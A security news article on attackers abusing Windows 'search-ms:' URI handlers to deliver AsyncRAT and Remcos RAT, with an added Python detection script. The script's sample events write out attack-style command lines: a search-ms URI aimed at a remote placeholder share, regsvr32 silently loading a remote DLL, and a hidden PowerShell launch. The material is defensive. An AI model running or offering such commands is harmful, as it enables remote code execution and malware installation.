According to cybersecurity analysts at Trellix, a legitimate Windows search feature has become the latest tool in the attacker’s arsenal. Threat actors are abusing it to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans, specifically AsyncRAT and Remcos RAT.
The technique abuses the “search-ms:” URI protocol handler, which lets applications and HTML links launch custom local searches on a device, together with the “search:” application protocol, which invokes the desktop search application on Windows.
“By directing users to websites that misuse the ‘search-ms’ functionality via JavaScript hosted on the page, the attackers have expanded their attack surface to HTML attachments,” reveal cybersecurity researchers Mathanraj Thangaraju and Sijo Jacob.
Threat actors are known to use fraudulent emails, which carry hyperlinks or HTML attachments containing a URL that redirects users to compromised websites. This activates the execution of JavaScript using the URI protocol handlers to conduct searches on a server controlled by the attacker.
Clicking on the link generates a warning “Open Windows Explorer?”. If approved, “the search results of remotely hosted malicious shortcut files are displayed in Windows Explorer, masqueraded as PDFs or other trusted icons, imitating local search results,” the researchers clarified.
This clever technique creates a sense of trust by concealing the fact that the user is being provided with remote files. Consequently, the user is more likely to open the file, assuming it’s from their own system, thereby unintentionally executing malicious code.
If a victim clicks one of the shortcut files, a rogue dynamic-link library (DLL) is executed via the regsvr32.exe utility. In an alternative version of the campaign, the shortcut files launch PowerShell scripts that quietly download additional payloads while displaying a decoy PDF document to mislead the victim.
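The chain described above (a search-ms/search URI pointing Explorer at a remote share, then regsvr32 loading a DLL from that share or a shortcut launching hidden PowerShell) can be spotted in process-creation telemetry. The following is an added detection example written for this article, not code from Trellix or the researchers; the event lines are constructed samples modelled loosely on Sysmon Event ID 1 fields, the 203.0.113.5 host is a TEST-NET placeholder, and the rule names are my own.

```python
import re
from typing import List, Tuple

# Constructed process-creation events (not real telemetry), one per line:
# "parent_image | image | command_line". Host 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    r"msedge.exe | explorer.exe | explorer.exe search-ms:query=Invoice&crumb=location:\\203.0.113.5@80\docs&displayname=Downloads",
    r"explorer.exe | regsvr32.exe | regsvr32.exe /s \\203.0.113.5@80\docs\update.dll",
    r"explorer.exe | powershell.exe | powershell.exe -w hidden -File <stage2-placeholder>.ps1",
    r"explorer.exe | explorer.exe | explorer.exe search-ms:query=report&crumb=location:C:\Users\alice\Documents",
    r"explorer.exe | regsvr32.exe | regsvr32.exe /s C:\Program Files\Vendor\plugin.dll",
]

SEARCH_URI = re.compile(r"\bsearch(?:-ms)?:", re.I)        # "search:" or "search-ms:" handler
REMOTE_PATH = re.compile(r"\\\\[^\\\s&]+|https?://", re.I)  # UNC/WebDAV path (\\host\share) or URL
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)  # PowerShell hidden-window switch


def classify(event: str) -> List[str]:
    """Return the names of the rules the event matches (empty list if nothing suspicious)."""
    parent, image, cmd = (part.strip() for part in event.split("|", 2))
    parent, image = parent.lower(), image.lower()
    hits: List[str] = []
    # Rule 1: the lure; a search:/search-ms: URI whose location crumb points at a remote host,
    # which makes remote files look like local search results (local-only crumbs are ignored).
    if SEARCH_URI.search(cmd) and REMOTE_PATH.search(cmd):
        hits.append("search-ms_remote_location")
    # Rule 2: the DLL stage; regsvr32 registering a library served from a remote share.
    if image.endswith("regsvr32.exe") and REMOTE_PATH.search(cmd):
        hits.append("regsvr32_remote_dll")
    # Rule 3: the PowerShell variant; Explorer (a clicked shortcut) launching a hidden PowerShell.
    if parent.endswith("explorer.exe") and image.endswith("powershell.exe") and HIDDEN_PS.search(cmd):
        hits.append("explorer_spawned_hidden_powershell")
    return hits


def scan(events: List[str]) -> List[Tuple[str, str]]:
    """Run every event through classify() and return (rule, event) pairs for each hit."""
    return [(rule, ev) for ev in events for rule in classify(ev)]


if __name__ == "__main__":
    for rule, ev in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {ev}")
```

Rule 3 on its own is noisy in environments where users run scripts from shortcuts; correlate it with rule 1 or 2 on the same host within a short window before alerting.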
Regardless of the method, these intrusions lead to the deployment of AsyncRAT and Remcos RAT, enabling the threat actors to remotely control the hosts, pilfer sensitive information, and potentially sell the access to other cybercriminals.
As Microsoft continues to tighten its defenses against such initial access vectors, adversaries are expected to turn to the URI protocol handler method to evade traditional security defenses and distribute malware.
Researchers caution, “Refrain from clicking on dubious URLs or downloading files from unverified sources as these actions can expose systems to malicious payloads delivered through the ‘search’ / ‘search-ms’ URI protocol handler.”